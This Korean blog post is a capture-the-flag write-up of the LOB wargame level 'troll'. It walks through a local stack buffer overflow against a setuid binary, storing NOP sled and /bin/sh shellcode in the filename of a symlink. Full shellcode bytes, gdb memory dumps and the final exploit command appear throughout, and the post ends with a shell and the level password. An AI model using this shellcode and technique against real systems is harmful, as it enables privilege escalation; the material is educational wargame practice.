시작
안녕하세요 :D
올라갈 수록 점점 경우의 수가 줄어드네요 ㅠㅠ
이번 녀석은 argc의 개수까지 제한했습니다. 파일명부터 페이로드가 상당히 더러워졌어요
시작해볼까요?
Write UP
[orge@localhost orge]$ ll
total 20
-rwsr-sr-x 1 troll troll 12693 Mar 1 2010 troll
-rw-r--r-- 1 root root 772 Mar 29 2010 troll.c
[orge@localhost orge]$
[orge@localhost orge]$ cat troll.c
/*
The Lord of the BOF : The Fellowship of the BOF
- troll
- check argc + argv hunter
*/
#include
#include
extern char **environ;
main(int argc, char *argv[])
{
char buffer[40];
int i;
// here is changed
if(argc != 2){
printf("argc must be two!\n");
exit(0);
}
// egghunter
for(i=0; environ[i]; i++)
memset(environ[i], 0, strlen(environ[i]));
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}
// check the length of argument
if(strlen(argv[1]) > 48){
printf("argument is too long!\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// buffer hunter
memset(buffer, 0, 40);
// one more!
memset(argv[1], 0, strlen(argv[1]));
}
argc, 인자값은 딱 2개
환경변수에 쉘코드 저장 불가
argv[1], 첫 번째 인자의 길이는 48 bytes 이하, 마지막에 0으로 초기화
버퍼에 쉘코드 저장 불가
많이도 막아놨습니다..
보이는 길은 딱 하나 있네요. 파일명에 nop과 쉘코드를 저장하는 것!
일단 /tmp/troll 디렉터리를 만든 후 troll 실행 파일을 nop + 쉘코드를 이름으로 복사하겠습니다.
[orge@localhost /tmp]$ mkdir troll
[orge@localhost /tmp]$
[orge@localhost /tmp]$ cd ~
[orge@localhost orge]$
[orge@localhost orge]$ cp troll /tmp/troll/`python -c 'print "\x90" * 100 + "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"'`
cp: cannot create regular file `/tmp/troll/▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒1▒1̀▒É▒1▒F̀1▒Ph//shh/bin▒▒PS▒▒°
̀1▒̀': No such file or directory
음.. 복사가 안되네요.
이름이 문제가 있는 것 같습니다.
구글링을 통해 찾아보니 \x2f는 /에 해당하는 값으로 파일명에 포함될 수 없다고 합니다.
제가 사용하는 쉘코드에는 \x2f가 있네요.. 따라서!!
저게 없는 쉘코드를 가져왔습니다.
\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81
짠
[orge@localhost troll]$ mv troll `python -c 'print "\x90" * 100 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`
[orge@localhost troll]$ ll
total 14
-rwsr-sr-x 1 orge orge 12693 May 6 09:26 ????????????????????????????????????????????????????????????????????????????????????????????????????▒?^1ɱ2?l?▒??▒?u▒▒?▒▒▒▒▒2▒Qi00tii0cjo?▒QT?▒?▒?▒?
아으 더러워
이 더러운 녀석을 gdb로 까봅시다.
[orge@localhost troll]$ gdb -q ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒^Q^1ɱ2▒l^N▒^A▒▒^Au▒▒^E▒▒▒▒▒2▒Qi00tii0cjo▒▒QT▒⚱^L
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x8048500 : push %ebp
0x8048501 <main+1>: mov %ebp,%esp
0x8048503 <main+3>: sub %esp,44
0x8048506 <main+6>: cmp DWORD PTR [%ebp+8],2
0x804850a <main+10>: je 0x8048523 <main+35>
0x804850c <main+12>: push 0x8048690
0x8048511 <main+17>: call 0x8048410
0x8048516 <main+22>: add %esp,4
0x8048519 <main+25>: push 0
0x804851b <main+27>: call 0x8048420
0x8048520 <main+32>: add %esp,4
0x8048523 <main+35>: nop
0x8048524 <main+36>: mov DWORD PTR [%ebp-44],0x0
0x804852b <main+43>: nop
0x804852c <main+44>: lea %esi,[%esi*1]
0x8048530 <main+48>: mov %eax,DWORD PTR [%ebp-44]
0x8048533 <main+51>: lea %edx,[%eax*4]
0x804853a <main+58>: mov %eax,%ds:0x80497cc
0x804853f <main+63>: cmp DWORD PTR [%eax+%edx],0
0x8048543 <main+67>: jne 0x8048547 <main+71>
0x8048545 <main+69>: jmp 0x8048587 <main+135>
0x8048547 <main+71>: mov %eax,DWORD PTR [%ebp-44]
0x804854a <main+74>: lea %edx,[%eax*4]
0x8048551 <main+81>: mov %eax,%ds:0x80497cc
0x8048556 <main+86>: mov %edx,DWORD PTR [%eax+%edx]
0x8048559 <main+89>: push %edx
0x804855a <main+90>: call 0x80483f0
0x804855f <main+95>: add %esp,4
0x8048562 <main+98>: mov %eax,%eax
0x8048564 <main+100>: push %eax
0x8048565 <main+101>: push 0
0x8048567 <main+103>: mov %eax,DWORD PTR [%ebp-44]
0x804856a <main+106>: lea %edx,[%eax*4]
0x8048571 <main+113>: mov %eax,%ds:0x80497cc
0x8048576 <main+118>: mov %edx,DWORD PTR [%eax+%edx]
0x8048579 <main+121>: push %edx
0x804857a <main+122>: call 0x8048430
0x804857f <main+127>: add %esp,12
0x8048582 <main+130>: inc DWORD PTR [%ebp-44]
0x8048585 <main+133>: jmp 0x8048530 <main+48>
0x8048587 <main+135>: mov %eax,DWORD PTR [%ebp+12]
0x804858a <main+138>: add %eax,4
0x804858d <main+141>: mov %edx,DWORD PTR [%eax]
0x804858f <main+143>: add %edx,47
0x8048592 <main+146>: cmp BYTE PTR [%edx],0xbf
0x8048595 <main+149>: je 0x80485b0 <main+176>
0x8048597 <main+151>: push 0x80486a3
0x804859c <main+156>: call 0x8048410
0x80485a1 <main+161>: add %esp,4
0x80485a4 <main+164>: push 0
0x80485a6 <main+166>: call 0x8048420
0x80485ab <main+171>: add %esp,4
0x80485ae <main+174>: mov %esi,%esi
---Type to continue, or q to quit---
0x80485b0 <main+176>: mov %eax,DWORD PTR [%ebp+12]
0x80485b3 <main+179>: add %eax,4
0x80485b6 <main+182>: mov %edx,DWORD PTR [%eax]
0x80485b8 <main+184>: push %edx
0x80485b9 <main+185>: call 0x80483f0
0x80485be <main+190>: add %esp,4
0x80485c1 <main+193>: mov %eax,%eax
0x80485c3 <main+195>: cmp %eax,48
0x80485c6 <main+198>: jbe 0x80485e0 <main+224>
0x80485c8 <main+200>: push 0x80486c0
0x80485cd <main+205>: call 0x8048410
0x80485d2 <main+210>: add %esp,4
0x80485d5 <main+213>: push 0
0x80485d7 <main+215>: call 0x8048420
0x80485dc <main+220>: add %esp,4
0x80485df <main+223>: nop
0x80485e0 <main+224>: mov %eax,DWORD PTR [%ebp+12]
0x80485e3 <main+227>: add %eax,4
0x80485e6 <main+230>: mov %edx,DWORD PTR [%eax]
0x80485e8 <main+232>: push %edx
0x80485e9 <main+233>: lea %eax,[%ebp-40]
0x80485ec <main+236>: push %eax
0x80485ed <main+237>: call 0x8048440
0x80485f2 <main+242>: add %esp,8
0x80485f5 <main+245>: lea %eax,[%ebp-40]
0x80485f8 <main+248>: push %eax
0x80485f9 <main+249>: push 0x80486d7
0x80485fe <main+254>: call 0x8048410
0x8048603 <main+259>: add %esp,8
0x8048606 <main+262>: push 40
0x8048608 <main+264>: push 0
0x804860a <main+266>: lea %eax,[%ebp-40]
0x804860d <main+269>: push %eax
0x804860e <main+270>: call 0x8048430
0x8048613 <main+275>: add %esp,12
0x8048616 <main+278>: mov %eax,DWORD PTR [%ebp+12]
0x8048619 <main+281>: add %eax,4
0x804861c <main+284>: mov %edx,DWORD PTR [%eax]
0x804861e <main+286>: push %edx
0x804861f <main+287>: call 0x80483f0
0x8048624 <main+292>: add %esp,4
0x8048627 <main+295>: mov %eax,%eax
0x8048629 <main+297>: push %eax
0x804862a <main+298>: push 0
0x804862c <main+300>: mov %eax,DWORD PTR [%ebp+12]
0x804862f <main+303>: add %eax,4
0x8048632 <main+306>: mov %edx,DWORD PTR [%eax]
0x8048634 <main+308>: push %edx
0x8048635 <main+309>: call 0x8048430
0x804863a <main+314>: add %esp,12
0x804863d <main+317>: leave
0x804863e <main+318>: ret
0x804863f <main+319>: nop
End of assembler dump.
strcpy 다음에 BP를 걸고 달려보겠습니다.
(gdb) r `python -c 'print "A" * 44 + "BBB" + "\xbf"'`
Starting program: /tmp/troll/▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒^1ɱ2▒l▒▒▒u▒▒▒▒▒▒▒2▒Qi00tii0cjo▒▒QT▒⚱
`python -c 'print "A" * 44 + "BBB" + "\xbf"'`
PuTTY
Breakpoint 1, 0x80485f2 in main ()
(gdb) x/200wx $esp
0xbffff9b4: 0xbffff9c0 0xbffffbd4 0x00000014 0x41414141
0xbffff9c4: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff9d4: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff9e4: 0x41414141 0x41414141 0xbf424242 0x00000000
0xbffff9f4: 0xbffffa34 0xbffffa40 0x40013868 0x00000002
0xbffffa04: 0x08048450 0x00000000 0x08048471 0x08048500
0xbffffa14: 0x00000002 0xbffffa34 0x08048390 0x0804866c
0xbffffa24: 0x4000ae60 0xbffffa2c 0x40013e90 0x00000002
0xbffffa34: 0xbffffb34 0xbffffbd4 0x00000000 0xbffffc05
0xbffffa44: 0xbffffc14 0xbffffc33 0xbffffc55 0xbffffc5f
0xbffffa54: 0xbffffe22 0xbffffe41 0xbffffe5b 0xbffffe70
0xbffffa64: 0xbffffe8c 0xbffffe97 0xbffffea4 0xbffffeac
0xbffffa74: 0xbffffebd 0xbffffec7 0xbffffed5 0xbffffee6
0xbffffa84: 0xbffffef4 0xbffffeff 0xbfffff0f 0x00000000
0xbffffa94: 0x00000003 0x08048034 0x00000004 0x00000020
0xbffffaa4: 0x00000005 0x00000006 0x00000006 0x00001000
0xbffffab4: 0x00000007 0x40000000 0x00000008 0x00000000
0xbffffac4: 0x00000009 0x08048450 0x0000000b 0x000001fb
0xbffffad4: 0x0000000c 0x000001fb 0x0000000d 0x000001fb
0xbffffae4: 0x0000000e 0x000001fb 0x00000010 0x0f8bfbff
0xbffffaf4: 0x0000000f 0xbffffb2f 0x00000000 0x00000000
0xbffffb04: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb14: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb24: 0x00000000 0x00000000 0x69000000 0x00363836
0xbffffb34: 0x706d742f 0x6f72742f 0x902f6c6c 0x90909090
0xbffffb44: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb54: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb64: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb74: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb84: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb94: 0x90909090 0x90909090 0x90909090 0xeb909090
0xbffffba4: 0xc9315e11 0x6c8032b1 0x8001ff0e 0xf67501e9
0xbffffbb4: 0xeae805eb 0x32ffffff 0x306951c1 0x69697430
0xbffffbc4: 0x6f6a6330 0x5451e48a 0xb19ae28a 0x0081ce0c
0xbffffbd4: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffbe4: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffbf4: 0x41414141 0x41414141 0x41414141 0xbf424242
0xbffffc04: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc14: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc24: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc34: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc44: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc54: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc64: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc74: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc84: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc94: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffca4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcb4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcc4: 0x00000000 0x00000000 0x00000000 0x00000000
굉장히 이상하지만 이겨내야 합니다..!!
nop들이 있는 곳이 보이네요. 주소를 0xbffffb64로 잡고 터뜨려볼까요?
[orge@localhost troll]$ /tmp/troll/▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒\xbf"'`▒▒▒▒▒▒▒▒▒▒▒▒▒^Q^1ɱ2▒l^N▒^A▒▒^Au▒▒^E▒▒▒▒▒2▒Qi00tii0cjo▒▒QT▒⚱^L `python -c 'print "A" * 44 + "\x64\xfb\xff
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAd▒▒▒
Segmentation fault (core dumped)
안되네요!!
우리의 희망 core를 뜯어봅시다.
[orge@localhost troll]$ gdb -q -c core
Core was generated by `/tmp/troll/▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒'.
Program terminated with signal 11, Segmentation fault.
#0 0xbfffff63 in ?? ()
(gdb) x/200wx $esp
0xbffff940: 0x00000000 0xbffff984 0xbffff990 0x40013868
0xbffff950: 0x00000002 0x08048450 0x00000000 0x08048471
0xbffff960: 0x08048500 0x00000002 0xbffff984 0x08048390
0xbffff970: 0x0804866c 0x4000ae60 0xbffff97c 0x40013e90
0xbffff980: 0x00000002 0xbffffa80 0xbffffb20 0x00000000
0xbffff990: 0xbffffb51 0xbffffb60 0xbffffb7f 0xbffffba1
0xbffff9a0: 0xbffffbab 0xbffffd6e 0xbffffd8d 0xbffffda7
0xbffff9b0: 0xbffffdbc 0xbffffdd8 0xbffffde3 0xbffffdf0
0xbffff9c0: 0xbffffdf8 0xbffffe09 0xbffffe13 0xbffffe21
0xbffff9d0: 0xbffffe32 0xbffffe40 0xbffffe4b 0xbffffe5b
0xbffff9e0: 0xbffffea8 0xbfffff4a 0x00000000 0x00000003
0xbffff9f0: 0x08048034 0x00000004 0x00000020 0x00000005
0xbffffa00: 0x00000006 0x00000006 0x00001000 0x00000007
0xbffffa10: 0x40000000 0x00000008 0x00000000 0x00000009
0xbffffa20: 0x08048450 0x0000000b 0x000001fb 0x0000000c
0xbffffa30: 0x000001fb 0x0000000d 0x000001fb 0x0000000e
0xbffffa40: 0x000001fb 0x00000010 0x0f8bfbff 0x0000000f
0xbffffa50: 0xbffffa7b 0x00000000 0x00000000 0x00000000
0xbffffa60: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffa70: 0x00000000 0x00000000 0x69000000 0x00363836
0xbffffa80: 0x706d742f 0x6f72742f 0x902f6c6c 0x90909090
0xbffffa90: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffaa0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffab0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffac0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffad0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffae0: 0x90909090 0x90909090 0x90909090 0xeb909090
0xbffffaf0: 0xc9315e11 0x6c8032b1 0x8001ff0e 0xf67501e9
0xbffffb00: 0xeae805eb 0x32ffffff 0x306951c1 0x69697430
0xbffffb10: 0x6f6a6330 0x5451e48a 0xb19ae28a 0x0081ce0c
0xbffffb20: 0x00000080 0x00000000 0x00000000 0x00000000
0xbffffb30: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb40: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb50: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb60: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb70: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb80: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb90: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffba0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbb0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbc0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbd0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbe0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbf0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc00: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc10: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc20: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc30: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc40: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc50: 0x00000000 0x00000000 0x00000000 0x00000000
nop이 있는 주소가 살짝 바뀌어있네요.
페이로드의 RET 부분을 0xbffffab0으로 수정해줍시다.
파일 이름이 이상해서 막 깨지고 덮어쓰여지고 난리도 아닌데 무시하시고 때려박아버려요!!
(심볼릭 링크 걸고 하시는 것 잊지 마세요!!)
[orge@localhost troll]$ ln -s ~/troll /tmp/troll/`python -c 'print "\x90" * 100 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`
[orge@localhost troll]$ ll
total 0
lrwxrwxrwx 1 orge orge 16 May 6 09:37 ????????????????????????????????????????????????????????????????????????????????????????????????????▒?^1ɱ2?l?▒??▒?u▒▒?▒▒▒▒▒2▒Qi00tii0cjo?▒QT?▒?▒?▒? -> /home/orge/troll
[orge@localhost troll]$
[orge@localhost troll]$ /tmp/troll/▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒\xbf"'`▒▒▒▒▒▒▒▒▒▒▒▒▒^Q^1ɱ2▒l^N▒^A▒▒^Au▒▒^E▒▒▒▒▒2▒Qi00tii0cjo▒▒QT▒⚱^L `python -c 'print "A" * 44 + "\xb0\xfa\xff
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA▒▒▒▒
bash$ whoami
troll
bash$ /bin/my-pass
euid = 508
aspirin
Exploit!!
마무리
core 없었으면 어쩔 뻔 했을까요 ㅠㅠ 그저 빛..
파일명으로 장난치다 보니깐 보기도 흉하고 좀.. 그랬습니다 역시 깔끔한게 최고에요
전 이만 챔스볼 준비하러 가보겠습니다!! 다음 문제에서 만나요 :D
'CTF_Write_UP > LOB' 카테고리의 다른 글
| [LOB] vampire (0) | 2019.07.04 |
|---|---|
| [LOB] troll (0) | 2019.07.04 |
| [LOB] darkelf (0) | 2019.05.09 |
| [LOB] wolfman (0) | 2019.05.09 |
| [LOB] orc (0) | 2019.05.09 |